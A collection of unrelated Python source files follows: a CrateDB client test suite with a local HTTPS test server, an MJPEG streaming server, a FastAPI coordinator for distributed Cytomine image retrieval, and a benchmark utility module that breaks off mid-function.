flag = sa.Column(sa.Boolean)
details = sa.Column(ObjectArray)
Session = sessionmaker(engine)
session = Session()
test.globs['sa'] = sa
test.globs['engine'] = engine
test.globs['Location'] = Location
test.globs['Base'] = Base
test.globs['session'] = session
test.globs['Session'] = Session
test.globs['CrateDialect'] = CrateDialect
class HttpsTestServerLayer(object):
PORT = 65534
HOST = "localhost"
CERT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),
"test_https.pem"))
__name__ = "httpsserver"
__bases__ = tuple()
class HttpsServer(HTTPServer):
def get_request(self):
socket, client_address = HTTPServer.get_request(self)
socket = ssl.wrap_socket(socket,
keyfile=HttpsTestServerLayer.CERT_FILE,
certfile=HttpsTestServerLayer.CERT_FILE,
cert_reqs=ssl.CERT_OPTIONAL,
server_side=True)
return socket, client_address
class HttpsHandler(BaseHTTPRequestHandler):
payload = json.dumps({"name": "test", "status": 200, })
def do_GET(self):
self.send_response(200)
self.send_header("Content-Length", len(self.payload))
self.send_header("Content-Type", "application/json; charset=UTF-8")
self.end_headers()
self.wfile.write(self.payload.encode('UTF-8'))
return
def __init__(self):
self.server = self.HttpsServer(
(self.HOST, self.PORT),
self.HttpsHandler
)
def setUp(self):
thread = threading.Thread(target=self.serve_forever)
thread.daemon = True # quit interpreter when only thread exists
thread.start()
time.sleep(1)
def serve_forever(self):
print("listening on", self.HOST, self.PORT)
self.server.serve_forever()
print("server stopped.")
def tearDown(self):
self.server.shutdown()
def setUpWithHttps(test):
test.globs['HttpClient'] = http.Client
test.globs['crate_host'] = "https://{0}:{1}".format(
HttpsTestServerLayer.HOST, HttpsTestServerLayer.PORT
)
test.globs['invalid_ca_cert'] = os.path.abspath(
os.path.join(os.path.dirname(__file__), "invalid_ca.pem")
)
test.globs['valid_ca_cert'] = os.path.abspath(
os.path.join(os.path.dirname(__file__), "test_https_ca.pem")
)
test.globs['pprint'] = pprint
test.globs['print'] = cprint
def _try_execute(cursor, stmt):
try:
cursor.execute(stmt)
except Exception:
pass
def tearDownWithCrateLayer(test):
# clear testing data
with connect(crate_host) as conn:
for stmt in ["DROP TABLE locations",
"DROP BLOB TABLE myfiles",
"DROP TABLE characters",
"DROP TABLE cities",
"DROP USER me",
"DROP USER trusted_me",
]:
_try_execute(conn.cursor(), stmt)
def test_suite():
suite = unittest.TestSuite()
flags = (doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
s = doctest.DocFileSuite(
'doctests/cursor.txt',
'doctests/connection.txt',
setUp=setUpMocked,
optionflags=flags,
encoding='utf-8'
)
suite.addTest(s)
suite.addTest(unittest.makeSuite(CursorTest))
suite.addTest(unittest.makeSuite(HttpClientTest))
suite.addTest(unittest.makeSuite(KeepAliveClientTest))
suite.addTest(unittest.makeSuite(ThreadSafeHttpClientTest))
suite.addTest(unittest.makeSuite(ParamsTest))
suite.addTest(unittest.makeSuite(ConnectionTest))
suite.addTest(unittest.makeSuite(RetryOnTimeoutServerTest))
suite.addTest(unittest.makeSuite(RequestsCaBundleTest))
suite.addTest(unittest.makeSuite(TestUsernameSentAsHeader))
suite.addTest(unittest.makeSuite(TestDefaultSchemaHeader))
suite.addTest(sqlalchemy_test_suite())
suite.addTest(doctest.DocTestSuite('crate.client.connection'))
suite.addTest(doctest.DocTestSuite('crate.client.http'))
s = doctest.DocFileSuite(
'doctests/https.txt',
setUp=setUpWithHttps,
optionflags=flags,
encoding='utf-8'
)
s.layer = HttpsTestServerLayer()
suite.addTest(s)
s = doctest.DocFileSuite(
'sqlalchemy/doctests/itests.txt',
'sqlalchemy/doctests/dialect.txt',
'sqlalchemy/doctests/reflection.txt',
setUp=setUpCrateLayerAndSqlAlchemy,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
s = doctest.DocFileSuite(
'doctests/http.txt',
'doctests/blob.txt',
'doctests/client.txt',
'doctests/mocking.txt',
'doctests/blob.txt',
setUp=setUpWithCrateLayer,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
s = doctest.DocFileSuite(
'doctests/sqlalchemy.txt',
setUp=setUpCrateLayerAndSqlAlchemy,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
return suite
|
server.py
|
# FIXME: Make a Python Unit test
import logging
import queue
import socket
import time
from glob import glob
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from pymjpeg import Image, boundary, request_headers, FileImage
logging.basicConfig(level=logging.DEBUG)
class FileImageHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.debug('GET response code: 200')
self.send_response(200)
# Response headers (multipart)
for k, v in request_headers().items():
self.send_header(k, v)
logging.debug('GET response header: ' + k + '=' + v)
# Multipart content
self.serve_images()
def serve_image(self, image: Image):
# Part boundary string
self.end_headers()
self.wfile.write(bytes(boundary, 'utf-8'))
self.end_headers()
# Part headers
for k, v in image.image_headers().items():
self.send_header(k, v)
# logging.debug('GET response header: %s = %s' % (k, v))
self.end_headers()
# Part binary
# logging.debug('GET response image: ' + filename)
try:
for chunk in image.get_byte_generator():
self.wfile.write(chunk)
except (ConnectionResetError, ConnectionAbortedError):
return
def serve_images(self):
t_start = time.time()
for i, filename in enumerate(glob('img/*.jpg')):
image = FileImage(filename)
logging.debug('GET response image: ' + filename)
self.serve_image(image)
fps = (i+1) / (time.time()-t_start)
logging.debug("served image %d, overall fps: %0.3f" % (i+1, fps))
def log_message(self, format, *args):
return
def BytesImageHandlerFactory(q: queue.Queue):
class BytesImageHandler(FileImageHandler):
def __init__(self, request, client_address, server):
self.queue = q
super().__init__(request, client_address, server)
def serve_images(self):
i = 0
t_start = time.time()
while True:
image = self.queue.get()
self.serve_image(image)
fps = (i + 1) / (time.time() - t_start)
logging.debug("served image %d, overall fps: %0.3f" % (i + 1, fps))
i += 1
def add_image(self, image: Image):
self.queue.put(image)
return BytesImageHandler
class MJPEGServer:
def __init__(self, port=8001, handler=FileImageHandler):
ipaddress = socket.gethostbyname(socket.gethostname())
address = "http://%s:%s" % (ipaddress, port)
logging.info('Listening on port %d ... address: %s' % (port, address))
self.httpd = HTTPServer(('', port), handler)
def start(self):
self.httpd.serve_forever()
if __name__ == '__main__':
from_files = True
if from_files:
# from files
server = MJPEGServer()
server.start()
else:
# from bytes; which could be coming from a bytestream or generated using e.g., opencv
image_queue = queue.Queue(maxsize=100)
handler_class = BytesImageHandlerFactory(q=image_queue)
server = MJPEGServer(handler=handler_class)
server_thread = Thread(target=server.start, daemon=True)
server_thread.start()
for filename in glob('img/*.jpg'):
image = FileImage(filename)
logging.debug('GET response image: ' + filename)
image_queue.put(image)
#wait until the current queue has been served before quiting
while not image_queue.empty():
time.sleep(1)
server_thread.join(timeout=1)
|
master.py
|
from fastapi import FastAPI, File, UploadFile, Request, Cookie, HTTPException
import uvicorn
import argparse
import json
import aiohttp
import requests
import multiprocessing
from cytomine import Cytomine
from cytomine.models import CurrentUser
from io import BufferedReader, BytesIO
from collections import defaultdict
import numpy as np
import faiss
import asyncio
import random
import zipfile
from cytomine.models.image import ImageInstanceCollection
import threading
import time
app = FastAPI()
class Master:
def __init__(self, ip, port, servers, http, host):
self.ip = ip
self.port = port
if servers is not None:
self.servers = {s: 0 for s in servers}
else:
self.servers = {}
self.http = 'http' if http else 'https'
self.host = host
threading.Thread(target=self.heartbeat, daemon=True).start()
def heartbeat(self):
while True:
for ip in self.servers.keys():
try:
req = requests.get('{}://{}/heartbeat'.format(self.http, ip), timeout=5)
except Exception as e:
self.servers[ip] = (np.inf, np.inf)
time.sleep(5)
parser = argparse.ArgumentParser()
parser.add_argument(
'--ip',
default='127.0.0.1'
)
parser.add_argument(
'--port',
default=8000,
type=int
)
parser.add_argument(
'--server_addresses',
nargs='+'
)
parser.add_argument(
'--http',
action='store_true'
)
parser.add_argument(
'--host'
)
args = parser.parse_args()
if __name__ != '__main__':
master = Master(args.ip, args.port, args.server_addresses, args.http, args.host)
lock = defaultdict(lambda: asyncio.Lock())
def sort_ips(ip_list, labeled):
if labeled:
ip_list.sort(key = lambda k: k[1][0])
else:
ip_list.sort(key = lambda k: k[1][1])
return [i for i, j in ip_list]
@app.get('/connect')
def connect(ip: str, nbr_images_labeled: int, nbr_images_unlabeled: int):
master.servers[ip] = (nbr_images_labeled, nbr_images_unlabeled)
return
@app.get('/servers_list')
def servers_list():
return {'list': list(master.servers.items())}
@app.post('/get_nearest_images')
async def nearest_images(nrt_neigh: int, client_pub_key: str='', only_labeled: str='true',
client_pri_key: str='', image: UploadFile=File(...)):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await image.read()
responses = []
ip_list = list(master.servers.keys())
async with lock[client_pub_key]:
async with aiohttp.ClientSession(trust_env=True) as session:
for ip in ip_list:
data = aiohttp.FormData()
data.add_field('image', content, filename=image.filename, content_type='multipart/form-data')
try:
async with session.post('{}://{}/nearest_neighbours/{}'.format(master.http, ip, only_labeled),
data=data,
params={'nrt_neigh': nrt_neigh, 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(100)) as resp:
responses.append(await resp.json())
except Exception as e:
print(e)
responses.append(None)
if np.all(np.array(responses) == None):
raise HTTPException(status_code=500, detail='No server alive')
indices = [i for i, _ in enumerate(responses) if responses[i] is not None]
ip_list = [ip_list[i] for i in indices]
req = [responses[i] for i in indices]
distances = np.zeros((len(req) * nrt_neigh, 1), dtype=np.float32)
for i, r in enumerate(req):
distances[i * nrt_neigh: i * nrt_neigh + len(r['distances']), :] = np.array(r['distances']).reshape((-1, 1))
distances[i * nrt_neigh + len(r['distances']): (i+1) * nrt_neigh, :] = 100000
index = faiss.IndexFlatL2(1)
index.add(distances)
_, labels = index.search(np.array([[0]], dtype=np.float32), nrt_neigh)
to_retrieve = defaultdict(list)
for l in labels[0]:
to_retrieve[l // nrt_neigh].append(int(l % nrt_neigh))
images = []
cls = []
names = []
async with aiohttp.ClientSession(trust_env=True) as session:
for ip, lbls in zip(ip_list, to_retrieve.values()):
if lbls != []:
try:
async with session.get('{}://{}/retrieve_images/{}'.format(master.http, ip, only_labeled),
params={'public_key': client_pub_key, 'private_key': client_pri_key},
json={'labels': list(lbls)},
timeout=aiohttp.ClientTimeout(100)) as resp:
images.append((await resp.json())['images'])
cls.append((await resp.json())['cls'])
names.append((await resp.json())['names'])
except Exception as e:
pass
if images == []:
raise HTTPException(status_code=500, detail='No server alive')
return {'images': [i for sublist in images for i in sublist],
'cls': [c for sublist in cls for c in sublist],
'names': [n for sublist in names for n in sublist],
'distances': [float(distances[l, 0]) for l in list(labels[0])]}
@app.post('/index_image')
async def put_image(client_pub_key: str, client_pri_key: str, image: UploadFile=File(...), label: str=''):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await image.read()
ip_list = sort_ips(list(master.servers.items()), label != '')
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
data = aiohttp.FormData()
data.add_field('image', content, filename=image.filename, content_type='multipart/form-data')
async with session.post('{}://{}/index_image'.format(master.http, ip),
data=data,
params={'label': label, 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(100)) as resp:
status = resp.status
if status == 409 or status == 422:
raise HTTPException(status_code=status, detail= await resp.json()['detail'])
if status != 200 and ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if status == 200:
break
except Exception as e:
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.post('/index_folder')
async def put_folder(client_pub_key: str, client_pri_key: str, labeled: bool, folder: UploadFile=File(...)):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await folder.read()
ip_list = sort_ips(list(master.servers.items()), labeled)
print(ip_list)
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
data = aiohttp.FormData()
data.add_field('folder', content, filename=folder.filename, content_type='multipart/form-data')
async with session.post('{}://{}/index_folder'.format(master.http, ip),
data=data,
params={'labeled': str(labeled), 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(5)) as resp:
status = resp.status
if status == 409 or status == 422 or status == 401:
raise HTTPException(status_code=status, detail= (await resp.json())['detail'])
if status != 200 and ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if status == 200:
break
except HTTPException as h:
raise HTTPException(h.status_code, h.detail)
except Exception as e:
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.get('/remove_image')
async def remove_image(client_pub_key: str, client_pri_key: str, name: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
ip_list = list(master.servers.keys())
for ip in ip_list:
async with aiohttp.ClientSession(trust_env=True) as session:
try:
async with session.get('{}://{}/remove_image'.format(master.http, ip),
params={'name': name, 'public_key': client_pub_key,
'private_key': client_pri_key},
timeout=aiohttp.ClientTimeout(5)) as resp:
pass
except Exception as e:
pass
@app.get('/index_slides')
async def add_slides(client_pub_key: str, client_pri_key: str, project_id: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
image_instances = ImageInstanceCollection().fetch_with_filter("project", project_id)
for image in image_instances:
ip_list = sort_ips(list(master.servers.items()), False)
while True:
ip = ip_list.pop()
async with aiohttp.ClientSession(trust_env=True) as session:
try:
await session.get('{}://{}/add_slide'.format(master.http, ip),
params={'public_key': client_pub_key,
'private_key': client_pri_key},
json={'id': image.id, 'width':image.width, 'project': project_id,
'height': image.height, 'resolution': image.resolution,
'magnification': image.magnification,
'filename': image.filename, 'originalFilename': image.filename},
timeout=aiohttp.ClientTimeout(300))
break
except Exception as e:
print(e)
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.get('/index_slide_annotations')
async def add_slides_annotations(client_pub_key: str, client_pri_key: str, project_id: str, label: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
image_instances = ImageInstanceCollection().fetch_with_filter("project", project_id)
ip_list = sort_ips(list(master.servers.items()), True)
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
await session.get('{}://{}/add_slide_annotations'.format(master.http, ip),
params={'public_key': client_pub_key,
'private_key': client_pri_key,
'project_id': project_id,
'term': label},
timeout=aiohttp.ClientTimeout(1000))
break
except Exception as e:
print(e)
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if __name__ == '__main__':
uvicorn.run('master:app', host=args.ip, port=args.port, reload=True,
debug=False, workers=multiprocessing.cpu_count())
|
util.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import annotations # Allow subscripting Popen
from dataclasses import dataclass, replace
from datetime import timedelta
from difflib import get_close_matches
from enum import Enum
from functools import reduce
from inspect import getfile
from math import ceil, floor, inf, isclose, isnan
from operator import mul
import os
from os import kill, name as os_name
from os.path import splitext
from pathlib import Path
from platform import node
from signal import signal, SIGINT
from subprocess import DEVNULL, PIPE, Popen, run
from stat import S_IREAD, S_IWRITE, S_IRUSR, S_IWUSR, S_IRGRP, S_IWGRP, S_IROTH, S_IWOTH
from statistics import median, StatisticsError
from sys import argv
from threading import Event, Thread
from time import sleep, time
from typing import Any, Callable, cast, Dict, Iterable, List, Mapping, Optional, Sequence, Union
from xml.etree.ElementTree import Element, parse as parse_xml
from psutil import process_iter
from result import Err, Ok, Result
from .collection_util import add, find, identity, is_empty, min_max_float
from .option import option_or
from .type_utils import check_cast, T, U, V, with_slots
def remove_str_start(s: str, start: str) -> str:
assert s.startswith(start), f"Expected {s} to start with {repr(start)}"
return s[len(start) :]
def remove_str_end(s: str, end: str) -> str:
assert s.endswith(end), f"Expected {s} to end with {end}"
return s[: -len(end)]
def remove_str_start_end(s: str, start: str, end: str) -> str:
return remove_str_end(remove_str_start(s, start), end)
def try_remove_str_start(s: str, start: str) -> Optional[str]:
return remove_str_start(s, start) if s.startswith(start) else None
def try_remove_str_end(s: str, end: str) -> Optional[str]:
return remove_str_end(s, end) if s.endswith(end) else None
def remove_char(s: str, char: str) -> str:
return s.translate(str.maketrans("", "", char))
def ensure_empty_dir(dir_path: Path) -> None:
ensure_dir(dir_path)
clear_dir(dir_path)
def unlink_if_exists(path: Path) -> None:
if path.exists():
path.unlink()
def clear_dir(dir_path: Path) -> None:
tries = 1
while tries > 0:
try:
# shutil.rmtree fails: github.com/hashdist/hashdist/issues/113#issuecomment-25374977
# TODO: avoid str(path)
for sub in dir_path.iterdir():
if not sub.is_dir():
sub.unlink()
for sub in dir_path.iterdir():
assert sub.is_dir()
clear_dir(sub)
sub.rmdir()
except OSError as e:
tries -= 1
if tries <= 0 or "The directory is not empty" not in e.strerror:
raise
sleep(1)
else:
break
def ensure_dir(dir_path: Path) -> None:
if not dir_path.exists():
assert dir_path.parent != dir_path
ensure_dir(dir_path.parent)
dir_path.mkdir()
def get_factor_diff(old: float, new: float) -> float:
if old == 0:
return 0 if new == 0 else inf if new > 0 else -inf
else:
return (new - old) / old
def get_max_factor_diff(values: Iterable[float]) -> Optional[float]:
mm = min_max_float(values)
return None if mm is None else get_factor_diff(*mm.to_pair())
def product(values: Sequence[float]) -> float:
return reduce(mul, values)
def geometric_mean(values: Sequence[float]) -> float:
# Geometric mean only works for positive values
assert all(v > 0 for v in values)
# 'pow' returns 'Any', this has caused me problems in the past
return check_cast(float, pow(product(values), 1.0 / len(values)))
def assert_is_percent(p: float) -> float:
return 0 <= p <= 100
def get_percent(f: float) -> float:
return f * 100
def percent_to_fraction(p: float) -> float:
return p / 100
def float_to_str(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.001 <= a < 10000:
if a < 0.01:
return "%.5f"
elif a < 0.1:
return "%.4f"
elif a < 1:
return "%.3f"
elif a < 10:
return "%.2f"
elif a < 100:
return "%.1f"
else:
return "%.0f"
else:
return "%.2e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-3)
return res
def float_to_str_smaller(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.01 <= a < 1000:
if a < 0.1:
return "%.3f"
elif a < 1:
return "%.2f"
elif a < 10:
return "%.1f"
else:
return "%.0f"
else:
return "%.1e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-2)
return res
def _assert_exists(path: Path) -> Path:
assert path.exists(), f"Could not find {path}"
return path
def assert_file_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_file(), f"{path} is not a file"
return path
def assert_dir_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_dir(), f"{path} is not a directory"
return path
def make_absolute_path(path: Path) -> Path:
if path.is_absolute():
return path
else:
return Path.cwd() / path
def get_existing_absolute_path(path: object, message: Optional[Callable[[], str]] = None) -> Path:
assert isinstance(path, str)
p = Path(path)
assert p.is_absolute(), f"Path {path} should be absolute" if message is None else message()
return _assert_exists(p)
def get_existing_absolute_file_path(
path: object, message: Optional[Callable[[], str]] = None
) -> Path:
p = get_existing_absolute_path(path, message)
assert p.is_file(), f"Path {p} exists, but is not a file"
return p
def stdev_frac(stdv: float, avg: float) -> float:
if avg == 0.0:
return 0.0 if stdv == 0.0 else 1.0
else:
return stdv / avg
def os_is_windows() -> bool:
return {OS.posix: False, OS.windows: True}[get_os()]
class OS(Enum):
posix = 0
windows = 1
def get_os() -> OS:
return {"nt": OS.windows, "posix": OS.posix}[os_name]
@with_slots
@dataclass(frozen=True)
class ExecArgs:
cmd: Sequence[str]
cwd: Optional[Path] = None
env: Optional[Mapping[str, str]] = None
# Don't print the command before running
quiet_print: bool = False
# Ignore print to stdout
quiet_stdout: bool = False
# Ignore print to stderr
quiet_stderr: bool = False
def print(self) -> None:
if not self.quiet_print:
print(self)
def __str__(self) -> str:
s = " ".join(self.cmd)
if self.cwd is not None:
s += f" (cwd {self.cwd})"
# printing env is too verbose
return s
def args_with_cmd(a: ExecArgs, cmd: Sequence[str]) -> ExecArgs:
# Note: replace is not type-safe, so putting this near the definition of cmd
return replace(a, cmd=cmd)
AnyPopen = Union["Popen[str]", "Popen[bytes]"]
def is_process_alive(process: AnyPopen) -> bool:
return process.poll() is None
class ExecError(Exception):
pass
def _call_and_allow_interrupts(args: ExecArgs) -> timedelta:
start_time_seconds = time()
process = Popen(
args.cmd,
cwd=args.cwd,
env=args.env,
stdout=DEVNULL if args.quiet_stdout else None,
stderr=DEVNULL if args.quiet_stderr else None,
)
def handler(sig: int, _: Any) -> None: # TODO: `_: FrameType`
process.send_signal(sig)
raise KeyboardInterrupt
signal(SIGINT, handler)
exit_code = process.wait()
if exit_code != 0:
quiet_warning = " (Try running without 'quiet_stderr')" if args.quiet_stderr else ""
raise ExecError(f"Process {args.cmd} failed with exit code {exit_code}{quiet_warning}")
return timedelta(seconds=time() - start_time_seconds)
def exec_cmd(args: ExecArgs) -> timedelta:
args.print()
return _call_and_allow_interrupts(args)
@with_slots
@dataclass(frozen=True)
class BenchmarkRunErrorInfo:
name: str
iteration_num: int
message: str
trace: List[str]
def print(self) -> None:
print(
f"- Benchmark: '{self.name}' -\n"
f"Iteration: {self.iteration_num}\n"
f"Error Message: {self.message}\n"
f"\nStack Trace:\n{self.__rebuild_trace()}\n"
)
def __rebuild_trace(self) -> str:
return "".join(self.trace)
@with_slots
@dataclass(frozen=True)
class ConfigRunErrorInfo:
name: str
benchmarks_run: BenchmarkErrorList
def print(self) -> None:
print(f"=== Configuration '{self.name}' ===\n")
for bench in self.benchmarks_run:
bench.print()
def add_benchmark(self, new_bench: BenchmarkRunErrorInfo) -> None:
self.benchmarks_run.append(new_bench)
@with_slots
@dataclass(frozen=True)
class CoreRunErrorInfo:
name: str
configs_run: ConfigurationErrorMap
def print(self) -> None:
print(f"===== Core '{self.name}' =====\n")
for config in self.configs_run.values():
config.print()
def add_config(self, new_config: ConfigRunErrorInfo) -> None:
add(self.configs_run, new_config.name, new_config)
@with_slots
@dataclass(frozen=True)
class ExecutableRunErrorInfo:
name: str
coreclrs_run: CoreErrorMap
def print(self) -> None:
print(f"======= Executable '{self.name}' =======\n")
for coreclr in self.coreclrs_run.values():
coreclr.print()
def add_coreclr(self, new_coreclr: CoreRunErrorInfo) -> None:
add(self.coreclrs_run, new_coreclr.name, new_coreclr)
RunErrorMap = Dict[str, ExecutableRunErrorInfo]
CoreErrorMap = Dict[str, CoreRunErrorInfo]
ConfigurationErrorMap = Dict[str, ConfigRunErrorInfo]
BenchmarkErrorList = List[BenchmarkRunErrorInfo]
def add_new_error(
run_errors: RunErrorMap,
exec_name: str,
core_name: str,
config_name: str,
bench_name: str,
iteration_num: int,
message: str,
trace: List[str],
) -> None:
if exec_name not in run_errors:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
coreclr_dict = {core_name: CoreRunErrorInfo(core_name, config_dict)}
add(run_errors, exec_name, ExecutableRunErrorInfo(exec_name, coreclr_dict))
else:
exec_info = run_errors[exec_name]
if core_name not in exec_info.coreclrs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
exec_info.add_coreclr(CoreRunErrorInfo(core_name, config_dict))
else:
core_info = exec_info.coreclrs_run[core_name]
if config_name not in core_info.configs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
core_info.add_config(ConfigRunErrorInfo(config_name, bench_list))
else:
config_info = core_info.configs_run[config_name]
config_info.add_benchmark(
BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)
)
@with_slots
@dataclass(frozen=True)
class WaitOnProcessResult:
stdout: str
# None if timed out
time_taken: Optional[timedelta]
def exec_start(args: ExecArgs, pipe_stdout: bool, pipe_stdin: bool = False) -> Popen[str]:
args.print()
assert not (args.quiet_stdout and pipe_stdout)
return Popen(
args.cmd,
env=args.env,
cwd=None if args.cwd is None else str(args.cwd),
stdin=PIPE if pipe_stdin else None,
stdout=DEVNULL if args.quiet_stdout else PIPE if pipe_stdout else None,
text=True,
)
def wait_on_process_with_timeout(
process: Popen[str], start_time_seconds: float, timeout_seconds: float
) -> WaitOnProcessResult:
assert is_process_alive(process)
done = Event()
killed = False
def process_kill_function() -> None:
nonlocal killed
is_done = done.wait(timeout=timeout_seconds)
if not is_done and is_process_alive(process):
print(f"Process timed out after {timeout_seconds} seconds! Sending SIGINT")
# process.send_signal(SIGINT) # This causes ValueError: Unsupported signal: 2
kill_process(process, time_allowed_seconds=1)
killed = True
process_killer = Thread(target=process_kill_function)
process_killer.start()
stdout, stderr = process.communicate()
assert stderr is None
returncode = process.wait()
end_time_seconds = time()
# If the process exited normally early, process_kill_function can exit.
# (If it was killed, this will have no effect)
done.set()
process_killer.join()
assert returncode == process.returncode
assert killed or process.returncode == 0, f"Process failed with code {process.returncode}"
return WaitOnProcessResult(
stdout=stdout,
time_taken=None if killed else timedelta(seconds=(end_time_seconds - start_time_seconds)),
)
def kill_process(process: AnyPopen, time_allowed_seconds: float) -> None:
assert is_process_alive(process)
kill(process.pid, SIGINT)
start_time_seconds = time()
while is_process_alive(process):
sleep(1)
if (time() - start_time_seconds) > time_allowed_seconds:
print(
f"Process '{check_cast(str, process.args)}' refused to shut down normally. "
+ "Trying again without asking nicely."
)
process.kill()
break
assert not is_process_alive(process)
class ExecutableNotFoundException(Exception):
def __init__(self, path: Path):
self.path = path
super().__init__(f"Cannot find {path}")
@with_slots
@dataclass(frozen=True)
class OutputAndExitCode:
stdout: str
exit_code: int
def exec_and_get_output_and_exit_code(args: ExecArgs) -> OutputAndExitCode:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise ExecutableNotFoundException(Path(args.cmd[0])) from None
except NotADirectoryError:
raise Exception(f"Invalid cwd: {args.cwd}") from None
return OutputAndExitCode(decode_stdout(r.stdout), r.returncode)
def exec_and_get_output(args: ExecArgs, expect_exit_code: Optional[int] = None) -> str:
expected_exit_code = option_or(expect_exit_code, 0)
res = exec_and_get_output_and_exit_code(args)
assert (
res.exit_code == expected_exit_code
), f"Returned with code {res.exit_code}, expected {expected_exit_code}"
return res.stdout
@with_slots
@dataclass(frozen=True)
class ProcessResult:
exit_code: int
stdout: str
stderr: str
def exec_and_get_result(args: ExecArgs) -> ProcessResult:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, stderr=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise Exception(f"Cannot find {args.cmd[0]}") from None
return ProcessResult(
exit_code=r.returncode, stdout=decode_stdout(r.stdout), stderr=decode_stdout(r.stderr)
)
def decode_stdout(stdout: bytes) -> str:
# Microsoft trademark confuses python
stdout = stdout.replace(b"\xae", b"")
return stdout.decode("utf-8").strip().replace("\r", "")
def exec_and_expect_output(args: ExecArgs, expected_output: str, err: str) -> None:
output = exec_and_get_output(args)
if output != expected_output:
print("actual:", repr(output))
print("expect:", repr(expected_output))
raise Exception(err)
_BYTES_PER_KB: int = 2 ** 10
_BYTES_PER_MB: int = 2 ** 20
_BYTES_PER_GB: int = 2 ** 30
def bytes_to_kb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_KB
def bytes_to_mb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_MB
def bytes_to_gb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_GB
def kb_to_bytes(kb: float) -> int:
return round(kb * _BYTES_PER_KB)
def mb_to_bytes(mb: float) -> int:
return round(mb * _BYTES_PER_MB)
def gb_to_bytes(gb: float) -> int:
return round(gb * _BYTES_PER_GB)
def kb_to_mb(kb: float) -> float:
return bytes_to_mb(kb_to_bytes(kb))
def mb_to_kb(mb: float) -> float:
return bytes_to_kb(mb_to_bytes(mb))
def mb_to_gb(mb: float) -> float:
return bytes_to_gb(mb_to_bytes(mb))
def gb_to_kb(gb: float) -> float:
return bytes_to_kb(gb_to_bytes(gb))
def gb_to_mb(gb: float) -> float:
return bytes_to_mb(gb_to_bytes(gb))
MSECS_PER_SECOND = 1000
USECS_PER_SECOND = 1_000_000
def show_size_bytes(n_bytes: float) -> str:
return show_in_units(
n_bytes,
(Unit(_BYTES_PER_GB, "GB"), Unit(_BYTES_PER_MB, "MB"), Unit(_BYTES_PER_KB, "KB")),
Unit(1, "bytes"),
)
@with_slots
@dataclass(frozen=True)
class Unit:
amount: float
name: str
def show_in_units(amount: float, units: Sequence[Unit], base_unit: Unit) -> str:
# Find a unit where this is >= 1 of it
unit = option_or(find(lambda u: abs(amount) >= u.amount, units), base_unit)
amount_in_units = (
str(amount) if unit.amount == 1 and amount % 1 == 0 else "%.2f" % (amount / unit.amount)
)
